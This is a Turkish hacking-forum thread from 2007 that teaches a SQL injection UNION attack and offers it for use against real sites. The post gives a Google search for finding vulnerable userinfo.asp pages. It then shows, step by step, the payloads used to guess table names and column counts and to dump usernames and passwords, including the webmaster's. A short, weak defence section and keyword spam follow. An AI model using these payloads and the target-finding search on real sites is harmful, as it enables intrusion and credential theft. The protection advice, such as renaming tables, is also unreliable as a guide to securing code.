HoşGeldin Ziyretçi, Lütfen Giriş Yap ya da Üye Ol
Ip Adresiniz: 38.107.179.241
Username:
Password:

Sayfa: [1]   Aşağı git
Bu Konuyu Gönder Yazdır
Gönderen Konu: SQL Enjection Union Açığı  (Okunma Sayısı 441 defa)
0 Üye ve 1 Ziyaretçi konuyu incelemekte.
MuratbanK'in HacKbanK Bilgileri
MuratbanK
кαяαηℓιктαкi göякєmℓi ιşιğιηιz
¼ ™ ѕιтє кυяυ©υѕυ © ¾
ωєвмαѕтєя üує
*


HacKbanK lıya Ozgu Mesajı ™ кαяαmuяαтвαηк © тєкєℓуєηιяαкı=нαуαт ρєєн

Cinsiyeti Bay
Uye Numarası (ID) 1
HacKbanK a Kayıt Tarihi Temmuz 13, 2007, 04:26:51 ÖS
Nerden тєкєℓуєηιяαкıηıη σℓ∂υgυ нєянαηgι вιя çιℓιηgιя ѕσƒяαѕıη∂αη
HacKbanKlının Yası: 30
HacKbanK taki Mesaj Sayısı 22317
HacKbanK Rep Puanı
Rep Puanı: 19748
Uyeyi Sikayet Et Moderatöre Bildir
Deneyimleri

Aktiflik

Deneyim
Seviye
HıyarlıK
HacKbanK Tecrubeleri

Paylasım

Guc/Power
Ukalalık
Tehlike Duzeyi
Iletisim Bilgileri
Üyelik Bilgileri Çevrimiçi Ruh Halim:
« : Temmuz 23, 2007, 07:42:50 ÖS »

SQL Enjection Union Açığı

Aşağıda yazanlar alıntıdır ve güzelde işe yarıyor
googlede inurl:userinfo.asp şeklinde arayabilirsiniz
güle güle kullanın.

1. SQL Injection Nedir?
SQL injection, dinamik içerikli, yani; asp,php,jsp… gibi diller ile beraber bir veri tabanı yönetim sisteminin kullanıldığı

web sayfalarında, SQL cümlelerinin yanlış çalışmasına sebep olacak bir takım karakterlerle sistemi yanıltıp, kendi amacınıza

uygun olarak kullanmanızı sağlayan bir hack yöntemidir.



          union select username,password from users where 1=1

ve enter’a basar. Sunucu aşağıdaki gibi bir hata döndürür;

Microsoft OLE DB Provider for ODBC Drivers (0x80040E37)
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query ’users’.

Make sure it exists and that its name is spelled correctly.

HHH anladı ki tablo ismini tutturamadı. Ama o genelde kullanılan tablo isimlerini çok iyi biliyor ve deneme yanılmayla bakın

bir süre sonra şu adres satırını yazdığında sunucu ona ne diyor;


          union select username,password from members where 1=1

[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not

match.

Hmmm… HHH tablo ismini tutturdu ama bu sefer alan sayısını tutturamadı. UNION’ da iki select cümlesindeki alanları eşit

olması gerektiğini hatırlayın. HHH pratik bir yöntem le bunu şu şekilde dener;



          union select 1 from members where 1=1

Yine olmadı;


          select 1,1 from members where 1=1

Olmadı!


          union select 1,1,1 from members where 1=1

Evet!!! Şimdi HHH sayfada şunun gibi bir şey görüyor;

İsim: 1
Soyad: 1
E-posta: 1

Şimdi select içerisinde kullandığı 1 lerin yerine istediği alanları yazması yeterli. Onun istediği kullanıcının adı ve

şifresi. Tecrübesiyle şöyle bir SQL injection satırını browser’ ına yazar;


          union select USERNAME,USERNAME,PASSWORD from members where 1=1

Ve tutturur. Artık gördüğüşey şu;

İsim: KurbanLIK
Soyad:Koyun
E-posta: şifre

HHH bu 10 dakika sonunda sistemi kırmayı başardı. Ama HHH’ ın asıl istediği webmaster’ ın şifresini bulmak. Basit bi şekilde

webmaster ın ID sini bulmak için, onun nick’ ine basar ve gelen sayfadaki adres satırın bakar;


         

Elbette; ID’ sinin 1 olduğunu öğrendi. Şimdi SQL bilgisini konuşturur


          union select USERNAME,USERNAME,PASSWORD from members where ID=1

İsim: XXX
Soyad: XXX
E-posta: şifre



5. Nasıl korunuruz
-Tablo isimlerinizin başına alias dediğimiz şeyler ekleyin; Yani ‘users’ diye çok genel bir tablo ismi kullanmak yerine

‘fb_users’ gibi isimler kullanın
-www.adres.com/userinfo.asp?ID=1 gibi bir adreste almış olduğunuz ID değerini kontrol edin. Sayısal bir değer bekliyorsanız,

sayısal bir değer aldığınızdan emin olun.
-Her zaman aldığınız değerlerdeki tehlikeli karakterleri sorgulayan bir alt program yazın.
-Biraz zor ancak search engine friendly dediğimiz sisteme yönelerek sitenizi oluşturun.
         
www.adres.com/userinfo.asp?ID=1


yerine
         
www.adres.com/userinfo/1
gibi bir yapıdan bahsediyorum. Apache’ de mümkün ama IIS’ te olmaz
Moderatöre Bildir   Kayıtlı
< -- Seo4SMF Social Bookmark -->
кαяαηℓιктαкi göякєmℓi ιşιğιηιz:
™ нттρ://ωωω.нα¢квαηк.gєη.тя ©


Robot Moderator
HacKer HacK HacKeD HacKing
*
Offlinehacker

Mesajlar: 33206


View Profile
Re: SQL Enjection Union Açığı
Posted on: Mayıs 26, 2012, 05:51:19 ÖS

 
      uyari
Hos Geldin Ziyaretci Arkadas. Ben Robot Moderator. HacKbanK tan Tam Anlamıyla Faydalanmak Icin Uye Olman Gerekmektedir.

giris  kayit
indir SQL Enjection Union Açığı indir, SQL Enjection Union Açığı download, SQL Enjection Union Açığı izle, SQL Enjection Union Açığı bul, SQL Enjection Union Açığı hack SQL Enjection Union Açığı hacked SQL Enjection Union Açığı hacking SQL Enjection Union Açığı hacker SQL Enjection Union Açığı programı SQL Enjection Union Açığı indir, SQL Enjection Union Açığı download, SQL Enjection Union Açığı izle, SQL Enjection Union Açığı smf, SQL Enjection Union Açığı kurulumu, SQL Enjection Union Açığı bul
Logged


Google Words: SQL Enjection Union Açığı indir, SQL Enjection Union Açığı download, SQL Enjection Union Açığı izle, SQL Enjection Union Açığı bul, SQL Enjection Union Açığı programı, SQL Enjection Union Açığı hack, SQL Enjection Union Açığı hacker, SQL Enjection Union Açığı hacked, SQL Enjection Union Açığı hacking, SQL Enjection Union Açığı resimleri, SQL Enjection Union Açığı videosu, SQL Enjection Union Açığı smf, SQL Enjection Union Açığı peeh,
Sayfa: [1]   Yukarı git
Bu Konuyu Gönder Yazdır
Otomatik Tag
SQL Enjection Union Açığı, indir , download , izle , bul , SQL Enjection Union Açığı, programı , resimleri , smf , SQL Enjection Union Açığı, hack , hacker , hacked , hacker , security , support , SQL Enjection Union Açığı

Gitmek istediğiniz yer:  

|Site Map | Arsiv | Wap | Wap2 | Wap Forum | XML | Rss
HacKbanK PowereD & DesigneD by MuratbanK
& to SupporTs iKeZioS & kroki2032 & MileF
Special Secret Security Scanner Server
Super Saccharine Silent Safety System by ScanX
Bu Sayfa 0.099 Saniyede 19 Sorgu ile Oluşturuldu